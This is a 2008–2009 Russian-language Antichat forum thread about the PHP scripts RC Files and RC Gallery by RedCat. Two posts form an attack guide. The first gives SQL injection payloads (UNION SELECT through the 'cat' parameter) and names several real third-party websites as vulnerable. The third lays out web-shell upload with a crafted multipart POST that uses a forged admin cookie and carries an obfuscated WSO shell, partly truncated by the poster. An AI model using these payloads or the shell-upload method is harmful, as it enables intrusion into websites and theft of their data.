ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости в скриптах от RedCat
  #1  
Старый 02.02.2008, 18:01
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow Уязвимости в скриптах от RedCat

Нашел банальную уязвимость в скрипте RC Files v1.0 от RedCat'a, но оказалось, что дырка эта присутствует и в другой его наработке, RC Gallery, причем кочует из версии к версии.

-------------------------------------
RC Files v1.0 | Powered by RedCat | ©2004-2008
-------------------------------------

Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос.

cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/*

гуглим, видим:

Цитата:
http://www.kfmgtu.ru/download/?cat=-3+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6,7,8,9,0/*
Цитата:
http://www.legalref.ru/rc/?cat=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,0/*
...

Уязвима также и версия 1.1, уязвимость аналогичная

Более распространенный скрипт RC Gallery имеет аналогичную ошибку:
-------------------------------------
RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008
-------------------------------------

Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос.

имеем

Цитата:
http://www.beeland.ru/pc/index.php?page=1&vtype=big&cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
Цитата:
http://www.space-studio.ru/gallery/?cat=-2+union+select+1,2,3,4,user(),6,7/*
Цитата:
http://www.suv4x4.ru/gallery/?cat=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
...

в версии 2.4 узвимость устранена.

keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat

Последний раз редактировалось Серенький; 02.02.2008 в 19:10..
 
Ответить с цитированием

  #2  
Старый 21.02.2008, 00:51
Аватар для redcat2
redcat2
Новичок
Регистрация: 19.02.2008
Сообщений: 3
Провел на форуме:
12035

Репутация: 5
Thumbs up

При помощи гугла наткнулся на данную статью.
Очень приятно , что на мои скрипты ктото обратил внимание))) Хоть и в таком ракурсе, но всёравно приятно! Спасибо.
Скрипт галереи , это мой первый большой скрипт. Ни о каких "мерах безопасности" речь там не шла, была идея создать скрипт. До версии 2.4 они почти не отличаются друг от друга. Версия 2.4 переписана почти с нуля, но используется несколько кусков старого кода. До версии 2.5 руки не дошли, нужно было зарабатывать деньги и я стал заниматься "коммерческими" скриптами. Галереи 2.5 не будет, да и вообще наверное никаких больше скриптов не будет, не позволяет занятость на другом фронте. В обще при создании этой галереи я получил огромный опыт, хотя после были и другие более серьёзные скрипты.

Если чтото интересно, спрашивайте...
А пока, всем пока
 
Ответить с цитированием

  #3  
Старый 24.11.2009, 00:04
Аватар для AFoST
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

наткнулся на эти скрипты а их до меня уже копали.. нашёл тоже самое.. такой облом.

====================
заливка шелла

1. пароль расшифровался.
идём в админку adm_gallery.php
редактируем Допустимые расширения и вписываем php через запятушку. заливаем шелл в месте загрузки картинок.
2. пароль не расшифровался.
посмотрев, исходники формируем сразу POST-запрос для заливки. По умолчанию php не фильтруется(!!!)
в куках ставим gal_admin_get_pass=<хеш пароля>

POST-запрос (весь код шелла wso не вместился)
Код:
POST /gal_admin.php HTTP/1.1
Host: site.ru
Keep-Alive: 30
Proxy-Connection: keep-alive
Cookie: gal_admin_get_pass=b01502fd0c860bdd35c5c9289de412db
Content-Type: multipart/form-data; boundary=---------------------------11538186919912
Content-Length: 23969

-----------------------------11538186919912
Content-Disposition: form-data; name="upload_cat"

1
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_name"

123
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_text"

234
-----------------------------11538186919912
Content-Disposition: form-data; name="upload_big_file"; filename="wso2.4.php"
Content-Type: application/force-download

<?php
$auth_pass = "пыщь";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31W
....
...тут код шелла)))
....
LkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>
-----------------------------11538186919912
Content-Disposition: form-data; name="com"

upload
-----------------------------11538186919912
Content-Disposition: form-data; name="gal_menu"

add
-----------------------------11538186919912--
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
[ Обзор: уязвимости cPanel ] Solide Snake Сценарии/CMF/СMS 11 22.11.2008 18:41
Классификация уязвимостей flintstone Статьи 1 16.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ